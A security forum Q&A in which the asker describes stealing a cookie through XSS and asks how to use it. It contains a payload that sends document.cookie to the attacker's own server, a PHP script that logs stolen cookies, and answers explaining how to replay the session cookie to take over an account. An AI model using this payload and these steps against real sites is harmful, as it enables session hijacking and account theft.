Skip to main content

How to use a stolen cookie? [Resolved]

I have taken advantage of an XSS vulnerability to steal a cookie by sending it as a variable in the URL to my php page. I think that is one of the normal processes.

This is the XSS payload:


And this is my php:

$cookie = $_GET['cookie'];

//open the file and choose the mode
$fh = fopen("users", "a");
fwrite($fh, $cookie);

//close the file
fclose($fh);

print "User Submitted: ";
print ($cookie);

Everything well so far. But now that I have the cookie, how do I use it to get into the website I stole it from?


Question Credit: aDoN
Question Reference
Asked September 2, 2019
Posted Under: Security
32 views
4 Answers

...php writes the cookie into a file. (I think that is one of the normal processes).

From what you wrote above, it seems that there could be some misconception with your understanding on how a session is being created and maintained on a website. When a user logs in to a website, a session id is generated and this id is stored in a special cookie, known as the session cookie, on the client's browser, like this:

PHPSESSID:fgws4j52jcm10dkgw02nd2

At the same time, a session file (or database row) with the same id is created containing variables (such as user name, login time) related to that particular user. These session variables are stored server side and called from the superglobal $_SESSION array when a session is started.

To hijack a session, what you need is a cookie containing the name-value pair like the one above. One precondition is that the victim must be logged in during the attack such that the session file with the stolen id is still fresh on the server. Also, the website must not be doing other extraneous checks (such as user agent or IP address) to thwart hijackers.

<script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script>

The javascript you wrote above merely injects a name-value pair in the superglobal $_GET array. What you want is to transmit the name-value pair using your browser cookie, certainly not with the URL.

Most modern browsers store the cookie information in a database such as sqlite. To edit a cookie, you need to access the web console or the developer toolbar which is covered here for Chrome and here for Firefox.


credit: Community
Answered September 2, 2019

You can use JavaScript to set the cookie in your browser:

document.cookie =
 'cookie1=test; expires=Fri, 3 Aug 2022 20:47:11 UTC; path=/'

Just need to open a console by pressing F12 or place the JavaScript in a webpage.

See https://stackoverflow.com/questions/14573223/set-cookie-and-get-cookie-with-javascript


credit: Community
Answered September 2, 2019

There are different ways of actually doing it, all boiling down to the same thing:

  • Usually, your browser should allow you to modify stored cookie value, just replace the current value by the one you've stolen
  • There are numerous browser addons & plugins that allow you to tamper your request before sending it, you can add or modify your cookie value on there
  • You can deploy a local proxy like Fiddler or Burp to basically do the same thing & tamper your request before sending it

credit: Dillinur
Answered September 2, 2019
Your Answer